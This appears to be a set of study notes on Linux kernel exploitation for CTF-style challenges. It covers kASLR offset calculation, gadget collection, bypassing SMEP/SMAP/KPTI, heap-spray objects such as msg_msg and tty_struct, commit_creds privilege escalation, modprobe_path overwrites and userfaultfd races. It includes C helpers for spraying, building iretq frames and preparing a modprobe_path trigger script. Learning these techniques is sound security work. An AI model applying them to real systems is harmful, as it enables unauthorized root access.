---
title: Linux Kernel pwn
tags: security
lang: zh_tw
---
# Linux Kernel pwn
## Inspection
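### Getting symbol addresses
Useful for setting breakpoints and inspecting kernel state.
```
# Read printk output
cat /proc/sys/kernel/dmesg_restrict # check whether you are allowed to read printk output
dmesg
# Get kernel module addresses
cat /proc/modules
lsmod
# Get the address of every symbol
cat /proc/sys/kernel/kptr_restrict # check whether you are allowed to read addresses from kallsyms
cat /proc/kallsyms
```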
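To use these addresses from an exploit, the lookup can also be done programmatically. A minimal sketch, assuming `/proc/kallsyms` is readable and not zeroed out by `kptr_restrict`; the helper names `kallsyms_match` and `kallsyms_lookup` are hypothetical:

```c
#include <stdio.h>
#include <string.h>

/* Parse one /proc/kallsyms line ("<hex addr> <type> <name> ...").
 * Returns 1 and stores the address if the symbol name equals `want`. */
int kallsyms_match(const char *line, const char *want, unsigned long *addr)
{
    unsigned long a;
    char type;
    char name[256];

    if (sscanf(line, "%lx %c %255s", &a, &type, name) != 3)
        return 0;
    if (strcmp(name, want) != 0)
        return 0;
    *addr = a;
    return 1;
}

/* Scan /proc/kallsyms for `want`. Returns 0 if the file cannot be opened,
 * the symbol is missing, or the address is hidden (printed as 0). */
unsigned long kallsyms_lookup(const char *want)
{
    char line[512];
    unsigned long addr = 0;
    FILE *f = fopen("/proc/kallsyms", "r");

    if (!f)
        return 0;
    while (fgets(line, sizeof(line), f))
        if (kallsyms_match(line, want, &addr))
            break;
    fclose(f);
    return addr;
}
```

For example, `kallsyms_lookup("commit_creds")` would return the runtime address of `commit_creds` when the file is readable.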
### Extracting vmlinux from bzImage
Once you have vmlinux, you can run ROPgadget on it to collect gadgets.
The [extract-vmlinux](https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux) script shipped in the Linux source tree does the job:
```
./extract-vmlinux bzImage > vmlinux
```
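### Getting gadgets
* Run [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) on vmlinux. Remember to set an address range so that only gadgets in executable memory are returned
* ropper takes longer to run, but its results are more accurate
    * `ropper --nocolor --file ./vmlinux > ropper_gadget`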
### Getting the kASLR offset
If kASLR is enabled, gadget addresses must also be rebased.
```
# Get the runtime address of _text
# cat /proc/kallsyms | grep "T _text"
ffffffff88600000 T _text
# Get the address of .text inside vmlinux
# readelf -a vmlinux | grep " .text"
[ 1] .text PROGBITS ffffffff81000000 00200000
00 .text .notes __ex_table .rodata .pci_fixup __ksymtab __ksymtab_gpl __ksymtab_strings __param __modver
# The difference between the two is the kASLR offset
# Suppose a gadget sits at 0xffffffff811bc873 in vmlinux
# Its runtime address is
# gadget - vmlinux .text base + runtime _text address
# 0xffffffff811bc873 - 0xffffffff81000000 + 0xffffffff88600000
# = 0xffffffff887bc873
```
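The same arithmetic as a helper, so a whole gadget list can be rebased at once. A small sketch; the function name `rebase` is hypothetical, and the values in the usage note are the ones from the example above:

```c
/* Rebase an address taken from vmlinux to its runtime location.
 * static_base:  address of .text inside vmlinux
 * runtime_base: address of _text read from /proc/kallsyms */
unsigned long rebase(unsigned long static_addr,
                     unsigned long static_base,
                     unsigned long runtime_base)
{
    return static_addr - static_base + runtime_base;
}
```

`rebase(0xffffffff811bc873, 0xffffffff81000000, 0xffffffff88600000)` gives `0xffffffff887bc873`, matching the manual calculation.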
### Getting memory info
Inspect slab/SLUB memory allocation statistics.
```
sudo cat /proc/meminfo
slabtop
sudo cat /proc/slabinfo
```
## Mitigations
### SMEP
* The kernel cannot execute code located in user pages
* Controlled by a bit in cr4
### SMAP
* The kernel cannot read or write user memory
* Controlled by a bit in cr4
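On x86-64, SMEP is bit 20 of cr4 and SMAP is bit 21. A minimal sketch for decoding a cr4 value, for example one copied from a crash log; the helper names are hypothetical and `0x3006f0` in the usage note is only an illustrative value:

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20) /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21) /* Supervisor Mode Access Prevention */

bool cr4_has_smep(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
bool cr4_has_smap(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }

/* The value cr4 would need to hold for both protections to be off. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}
```

With `cr4 = 0x3006f0`, both checks return true and `cr4_without_smep_smap` returns `0x6f0`.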
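### KPTI
* Kernel mode and user mode use separate page tables. The effect partly overlaps with SMEP, because user pages are mapped non-executable in the kernel page tables
* Introduced to block the Meltdown side-channel attack
* When returning to user mode, cr3 must be switched back to the user page tables
    * Jumping to `swapgs_restore_regs_and_return_to_usermode` takes care of this: it restores cr3 for you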
## Commonly used structures
* `tty_struct` (0x2e0, 0x2c0): can leak kernel base and heap addresses
    * [Definition](https://elixir.bootlin.com/linux/latest/source/include/linux/tty.h#L285)
    * Allocate
        * `int pfd = open("/dev/ptmx", O_RDWR|O_NOCTTY);`
    * Release
        * `close(pfd)`
    * Write
        * `write(pfd, garbage, sizeof(garbage))`
    * Control flow
        * Controlling the `tty_operations` vtable may give control of execution
    * Relevant offsets
        * offset 0: must hold the magic number
          ```c
          /* tty magic number */
          #define TTY_MAGIC 0x5401
          ```
        * offset 0x18: pointer to the `tty_operations` structure; the offset below is inside that structure
            * offset 0x38 (56 decimal): the `write` function pointer
* `shm_file_data` (0x20): can leak kernel base and heap addresses
* `seq_operations` (0x20): can leak kernel base
* `msg_msg` (0x30 ~ 0x1000): can leak heap addresses
    * `msgget()`
    * `msgsnd(qid, &msgbuf, real_size - 0x30, 0)`
        * Calls `kmalloc(size + 0x30)`
        * Copies the contents of msgbuf to chunk + 0x30; the first 0x30 bytes are the header
    * `msgrcv(qid, &msgbuf, real_size - 0x30, 1, 0)`
        * `kfree()`
    * https://duasynt.com/blog/linux-kernel-heap-spray
* `subprocess_info` (0x60): can leak kernel base and heap addresses
* References
    * [Kernel Exploitで使える構造体集](https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628)
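The `msg_msg` size rule above (`kmalloc(size + 0x30)`) can be turned into a small spray helper. A minimal sketch, assuming the 0x30-byte header quoted above and a queue obtained with `msgget(IPC_PRIVATE, 0666 | IPC_CREAT)`; the names `msg_payload_size` and `spray_msg_msg` are hypothetical:

```c
#include <stddef.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define MSG_MSG_HDR 0x30   /* header size quoted in the notes above */
#define MSG_MSG_MAX 0x1000 /* largest chunk size covered by the notes above */

struct spray_msg {
    long mtype;
    char mtext[MSG_MSG_MAX - MSG_MSG_HDR];
};

/* Payload length to pass to msgsnd() so that the kernel allocates
 * `chunk_size` bytes. Returns 0 if chunk_size is out of range. */
size_t msg_payload_size(size_t chunk_size)
{
    if (chunk_size <= MSG_MSG_HDR || chunk_size > MSG_MSG_MAX)
        return 0;
    return chunk_size - MSG_MSG_HDR;
}

/* Send up to `count` messages filled with `fill`. Returns how many were
 * queued. IPC_NOWAIT makes msgsnd() fail instead of blocking once the
 * queue's byte limit is reached. */
int spray_msg_msg(int qid, size_t chunk_size, int count, unsigned char fill)
{
    struct spray_msg msg;
    size_t len = msg_payload_size(chunk_size);
    int sent = 0;

    if (len == 0)
        return 0;
    msg.mtype = 1; /* matches the msgrcv(..., 1, 0) call above */
    memset(msg.mtext, fill, sizeof(msg.mtext));
    while (sent < count && msgsnd(qid, &msg, len, IPC_NOWAIT) == 0)
        sent++;
    return sent;
}
```

A single queue only holds a limited number of bytes, so a larger spray would likely need several queues.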
## Common Vulns
### Double fetch
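* A race condition between kernel space and user space
* The kernel reads the same user-space data twice, which leaves a window between the two reads in which user space can change it (the first read returns A, the second returns B)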
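The pattern can be modelled in plain user-space C. This is only an illustrative model, not kernel code: `struct request`, `double_fetch_model`, and the hook standing in for the racing thread are all hypothetical names.

```c
#include <stddef.h>

/* Stand-in for a request structure that lives in user memory. */
struct request {
    size_t len;
};

/* Stand-in for the racing user thread; runs between the two fetches. */
typedef void (*race_hook)(struct request *);

/* Models a handler that validates len on the first fetch but uses the
 * value from a second fetch. Returns the length that would actually be
 * used, or -1 if validation rejects the request. */
long double_fetch_model(struct request *user_req, size_t buf_size,
                        race_hook hook)
{
    size_t checked = user_req->len; /* fetch 1: validation */

    if (checked > buf_size)
        return -1;
    if (hook)
        hook(user_req);             /* race window */
    return (long)user_req->len;     /* fetch 2: use */
}

/* Example racer: swaps in a length that would have failed validation. */
void flip_to_large(struct request *r)
{
    r->len = 0x1000;
}
```

With a 64-byte buffer and `len = 8`, the model returns 8 without a racer and 0x1000 with `flip_to_large`, which is the overflow condition. The usual fix is to fetch once into a kernel-side copy and use only that copy.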
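## Exploit techniques
### Privilege escalation
* Get the kernel to execute `commit_creds(prepare_kernel_cred(0))` to gain root
    * `pop rdi` (loads the argument 0)
    * `mov rdi, rax` (passes the return value of `prepare_kernel_cred` to `commit_creds`)
* Return to user mode
    * swapgs
    * iretq
* Then execute /bin/sh
* For iretq, lay out the stack in this order
    * rip
    * user_cs
    * user_eflags
    * user_sp
    * user_ss
* The following function saves the user-mode registers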
```c
unsigned long user_cs, user_ss, user_eflags, user_sp;
void save_stats()
{
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "movq %%rsp, %3\n"
        "pushfq\n"
        "popq %2\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_eflags), "=r"(user_sp)
        :
        : "memory"
    );
}
```
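The iretq frame order listed above can be written into a ROP chain with a small helper. A sketch only: `struct user_ctx` and `push_iretq_frame` are hypothetical names, and the saved values would come from something like `save_stats()`.

```c
#include <stddef.h>

/* User-mode register values captured before entering the kernel. */
struct user_ctx {
    unsigned long cs, ss, rflags, sp;
};

/* Append the five-slot iretq frame to chain[] starting at index i.
 * Order: rip, cs, rflags, rsp, ss. Returns the next free index. */
size_t push_iretq_frame(unsigned long *chain, size_t i,
                        unsigned long rip, const struct user_ctx *u)
{
    chain[i++] = rip;       /* where user mode resumes, e.g. a shell function */
    chain[i++] = u->cs;
    chain[i++] = u->rflags;
    chain[i++] = u->sp;
    chain[i++] = u->ss;
    return i;
}
```

The frame goes directly after the `swapgs` and `iretq` gadget addresses in the chain.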
### modprobe_path
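* A kernel global variable
    * Exposed as `/proc/sys/kernel/modprobe`
* When you execute a file whose format the kernel does not recognize, the kernel runs the program named by the `modprobe_path` string
* Code path
    * sys_execve
    * do_execve
    * do_execveat_common
    * bprm_execve
    * exec_binprm
    * **search_binary_handler**
    * request_module
    * call_modprobe
    * call_usermodehelper_exec
* Exploitation
    * Overwrite modprobe_path with the path of your own malicious program
    * Execute something that is not a valid executable, so that the kernel does not recognize it
    * The kernel then runs your malicious program :)
* Exploitation, variant 2
    * Sometimes the kernel panics if execution continues after the overwrite
    * That is fine: right after the overwrite, put the program into an infinite loop and leave it running in the background
    * Nothing crashes, and `modprobe_path` stays overwritten
* Side note
    * Shebang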
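The user-space half of this trick can be prepared with a few file writes. A minimal sketch: the helper script copies a hypothetical `/flag` file, all paths and function names are assumptions, and the kernel write that overwrites `modprobe_path` is not shown.

```c
#include <fcntl.h>
#include <stddef.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create `path` with the given contents and mode 0755. */
int write_exec_file(const char *path, const void *data, size_t len)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    int ok;

    if (fd < 0)
        return -1;
    ok = write(fd, data, len) == (ssize_t)len && fchmod(fd, 0755) == 0;
    close(fd);
    return ok ? 0 : -1;
}

/* helper_path: the program modprobe_path will be pointed at.
 * dummy_path:  a file with an unknown, non-printable 4-byte magic, so
 *              that no binary format handler recognizes it. */
int prepare_modprobe_trigger(const char *helper_path, const char *dummy_path)
{
    /* /flag is a hypothetical target; adjust to the challenge. */
    static const char script[] =
        "#!/bin/sh\ncp /flag /tmp/flag\nchmod 644 /tmp/flag\n";
    static const char magic[] = "\xff\xff\xff\xff";

    if (write_exec_file(helper_path, script, strlen(script)) < 0)
        return -1;
    return write_exec_file(dummy_path, magic, 4);
}
```

Once `modprobe_path` holds `helper_path`, executing `dummy_path` (for example with `system()`) should make the kernel run the helper.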
### setxattr & userfaultfd
* `userfaultfd`
    * Registers a user-space page fault handler for a memory region
    * `copy_from_user` and `copy_to_user` also trigger the page fault
    * Use it to create race conditions
* `setxattr`
```c
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
         size_t size, int flags)
{
    int error;
    void *kvalue = NULL;
    char kname[XATTR_NAME_MAX + 1];
    if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
        return -EINVAL;
    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
        if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
            (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
            posix_acl_fix_xattr_from_user(kvalue, size);
        else if (strcmp(kname, XATTR_NAME_CAPS) == 0) {
            error = cap_convert_nscap(d, &kvalue, size);
            if (error < 0)
                goto out;
            size = error;
        }
    }
    error = vfs_setxattr(d, kname, kvalue, size, flags);
out:
    kvfree(kvalue);
    return error;
}
```
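* Note the calls to `kvmalloc`, `copy_from_user`, and `kvfree` in the code above
* `kvmalloc` can be triggered whenever you want (size 1 ~ 0x10000)
* Data is copied from user land into the chunk (`copy_from_user`)
* Combined with `userfaultfd`, you control exactly when the `kvfree` happens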
### mmap
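* `mmap` can be used to allocate memory at a chosen address
* Combined with a gadget such as `mov esp, eax`, this migrates the stack into the `mmap`ed region. When control flow can only be hijacked once, this turns the problem into ROP
* Example
```c
// Allocate address space for the ROP chain.
// ULL is assumed to be a typedef for unsigned long long;
// addr is the page-aligned address the pivot gadget moves the stack to.
ULL *rop_chain = mmap((void *)addr,
                      0x1000,
                      PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, // MAP_FIXED: map exactly at addr
                      -1, // no backing file for an anonymous mapping
                      0);
```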
### signal
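* Crashing right after returning to user mode?
    * Register the shell function as the SIGSEGV handler, so the crash itself spawns the shell: `signal(SIGSEGV, get_shell);`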
## Other notes
### `current` and gs:off_14D00
Inside the kernel, `current` refers to the task that is currently running.
Consider the following code:
```c
/*
 * This routine handles page faults. It determines the address,
 * and the problem, and then passes it off to one of the appropriate
 * routines.
 */
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
                unsigned long address)
{
    struct vm_area_struct *vma;
    struct task_struct *tsk;
    struct mm_struct *mm;
    vm_fault_t fault, major = 0;
    unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;
    u32 pkey;
    tsk = current;
    mm = tsk->mm;
    prefetchw(&mm->mmap_sem);
```
([v4.19.98 | __do_page_fault, line 1206](https://elixir.bootlin.com/linux/v4.19.98/source/arch/x86/mm/fault.c#L1206))
The corresponding x86-64 assembly is:
```asm
.text:FFFFFFFF81043110 push rbp
.text:FFFFFFFF81043111 mov rax, gs:off_14D00
.text:FFFFFFFF8104311A mov rbp, rsp
.text:FFFFFFFF8104311D push r15
.text:FFFFFFFF8104311F push r14
.text:FFFFFFFF81043121 push r13
.text:FFFFFFFF81043123 mov r13, rsi
.text:FFFFFFFF81043126 push r12
.text:FFFFFFFF81043128 mov r12, rdi
.text:FFFFFFFF8104312B push rbx
.text:FFFFFFFF8104312C mov rbx, rdx
.text:FFFFFFFF8104312F sub rsp, 38h
.text:FFFFFFFF81043133 mov r14, [rax+2A8h]
.text:FFFFFFFF8104313A mov [rbp+var_40], rax
.text:FFFFFFFF8104313E lea rax, [r14+60h]
.text:FFFFFFFF81043142 mov [rbp+var_38], rax
.text:FFFFFFFF81043146 prefetcht0 byte ptr [r14+60h]
```
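**So `gs:off_14D00` holds `current`.** The value loaded from it into `rax` is dereferenced at offset `2A8h` to obtain `mm`, which matches `tsk = current; mm = tsk->mm;` in the source.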
### gdb debug
```
add-symbol-file path/to/.kofile
```
* If the module ships with symbols, you can load them like this
```
add-symbol-file driver.ko <driver_base_addr> [-s <section1_name> <section1_addr>] ...
```
### Source code tracing
copy_from_user -> ... -> copy_user_generic
### cpio
```
mkdir rootfs
cd rootfs
# Unpack: gunzip replaces ../rootfs.cpio.gz with ../rootfs.cpio
gunzip ../rootfs.cpio.gz
sudo cpio -idm < ../rootfs.cpio
sudo chown root:root -R .
# Repack, uncompressed
sudo find . -print | sudo cpio -o -Hnewc > ../my.cpio
# Repack, gzip-compressed
sudo find . -print | sudo cpio -o -Hnewc | gzip -9 > ../my.cpio.gz
```
* [decompress_cpio.sh](https://gist.github.com/brant-ruan/784808bc192fff533d8be22932c4e2b6)
```bash
#!/bin/bash
# Decompress a .cpio.gz packed file system
rm -rf ./initramfs && mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
gzip -dc initramfs.cpio.gz | cpio -idm &>/dev/null && rm initramfs.cpio.gz
popd
```
* [compile_exp_and_compress_cpio.sh](https://gist.github.com/brant-ruan/b67dc2fbae150e7bc76fda914816f534)
```bash
#!/bin/bash
# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd
```
`./compile_exp_and_compress_cpio.sh exploit.c`
### Kernel Memory Layout
* https://elixir.bootlin.com/linux/v4.9.249/source/Documentation/x86/x86_64/mm.txt
```
Virtual memory map with 4 level page tables:
0000000000000000 - 00007fffffffffff (=47 bits) user space, different per mm
hole caused by [48:63] sign extension
ffff800000000000 - ffff87ffffffffff (=43 bits) guard hole, reserved for hypervisor
ffff880000000000 - ffffc7ffffffffff (=64 TB) direct mapping of all phys. memory
ffffc80000000000 - ffffc8ffffffffff (=40 bits) hole
ffffc90000000000 - ffffe8ffffffffff (=45 bits) vmalloc/ioremap space
ffffe90000000000 - ffffe9ffffffffff (=40 bits) hole
ffffea0000000000 - ffffeaffffffffff (=40 bits) virtual memory map (1TB)
... unused hole ...
ffffec0000000000 - fffffbffffffffff (=44 bits) kasan shadow memory (16TB)
... unused hole ...
ffffff0000000000 - ffffff7fffffffff (=39 bits) %esp fixup stacks
... unused hole ...
ffffffef00000000 - fffffffeffffffff (=64 GB) EFI region mapping space
... unused hole ...
ffffffff80000000 - ffffffff9fffffff (=512 MB) kernel text mapping, from phys 0
ffffffffa0000000 - ffffffffff5fffff (=1526 MB) module mapping space
ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls
ffffffffffe00000 - ffffffffffffffff (=2 MB) unused hole
```